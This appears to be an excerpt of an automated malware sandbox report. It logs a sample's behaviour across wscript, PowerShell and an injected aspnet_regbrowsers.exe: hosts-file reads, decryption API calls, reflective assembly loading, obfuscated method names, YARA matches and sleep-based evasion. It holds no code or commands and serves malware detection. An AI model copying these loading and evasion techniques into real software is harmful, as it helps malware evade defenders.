Source: 7.0.aspnet_regbrowsers.exe.400000.0.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.0.aspnet_regbrowsers.exe.400000.0.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Yara match	File source: 7.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.powershell.exe.1ad00a6df58.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.powershell.exe.1ad00d7d970.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.powershell.exe.1ad00a6df58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.powershell.exe.1ad005bda68.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.powershell.exe.1ad00d7d970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.powershell.exe.1ad005bda68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.powershell.exe.1ad005a9550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.442084442.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.441493494.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.451128327.000001AD00472000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.454898865.000001AD00EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.454106266.000001AD00A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.454182650.000001AD00A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.442383411.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.441817870.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: 7.0.aspnet_regbrowsers.exe.400000.2.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	.Net Code: OIQBvWtCEU System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.aspnet_regbrowsers.exe.400000.2.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	.Net Code: ptmPckVUZnHxsSZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.aspnet_regbrowsers.exe.400000.4.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	.Net Code: OIQBvWtCEU System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.aspnet_regbrowsers.exe.400000.4.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	.Net Code: ptmPckVUZnHxsSZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.aspnet_regbrowsers.exe.400000.1.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	.Net Code: OIQBvWtCEU System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.aspnet_regbrowsers.exe.400000.1.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	.Net Code: ptmPckVUZnHxsSZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.aspnet_regbrowsers.exe.400000.0.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	.Net Code: OIQBvWtCEU System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.aspnet_regbrowsers.exe.400000.0.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	.Net Code: ptmPckVUZnHxsSZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.aspnet_regbrowsers.exe.400000.3.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	.Net Code: OIQBvWtCEU System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.aspnet_regbrowsers.exe.400000.3.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	.Net Code: ptmPckVUZnHxsSZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: 7.0.aspnet_regbrowsers.exe.400000.2.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	High entropy of concatenated method names: 'NpLLYQjDtNqZAtD', 'dNBvrZUnhKcCfYc', 'qTfydEKlKTvDZUtV', 'RGnnDInsUdzyrgaQff', 'YJkcSFDqkdqnmdtUs', 'VbenGBRRHEK', 'noiiYlhWMwKzdNXd', 'koCkaepbfEuxY', 'zSkvyxAMsdY', 'plMqppJdDh'
Source: 7.0.aspnet_regbrowsers.exe.400000.4.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	High entropy of concatenated method names: 'NpLLYQjDtNqZAtD', 'dNBvrZUnhKcCfYc', 'qTfydEKlKTvDZUtV', 'RGnnDInsUdzyrgaQff', 'YJkcSFDqkdqnmdtUs', 'VbenGBRRHEK', 'noiiYlhWMwKzdNXd', 'koCkaepbfEuxY', 'zSkvyxAMsdY', 'plMqppJdDh'
Source: 7.0.aspnet_regbrowsers.exe.400000.1.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	High entropy of concatenated method names: 'NpLLYQjDtNqZAtD', 'dNBvrZUnhKcCfYc', 'qTfydEKlKTvDZUtV', 'RGnnDInsUdzyrgaQff', 'YJkcSFDqkdqnmdtUs', 'VbenGBRRHEK', 'noiiYlhWMwKzdNXd', 'koCkaepbfEuxY', 'zSkvyxAMsdY', 'plMqppJdDh'
Source: 7.0.aspnet_regbrowsers.exe.400000.0.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	High entropy of concatenated method names: 'NpLLYQjDtNqZAtD', 'dNBvrZUnhKcCfYc', 'qTfydEKlKTvDZUtV', 'RGnnDInsUdzyrgaQff', 'YJkcSFDqkdqnmdtUs', 'VbenGBRRHEK', 'noiiYlhWMwKzdNXd', 'koCkaepbfEuxY', 'zSkvyxAMsdY', 'plMqppJdDh'
Source: 7.0.aspnet_regbrowsers.exe.400000.3.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	High entropy of concatenated method names: 'NpLLYQjDtNqZAtD', 'dNBvrZUnhKcCfYc', 'qTfydEKlKTvDZUtV', 'RGnnDInsUdzyrgaQff', 'YJkcSFDqkdqnmdtUs', 'VbenGBRRHEK', 'noiiYlhWMwKzdNXd', 'koCkaepbfEuxY', 'zSkvyxAMsdY', 'plMqppJdDh'

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5848	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -100042s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 2880	Thread sleep count: 1756 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -99901s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 2880	Thread sleep count: 8107 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -99792s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -99682s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -99573s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -99464s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -99354s >= -30000s	Jump to behavior
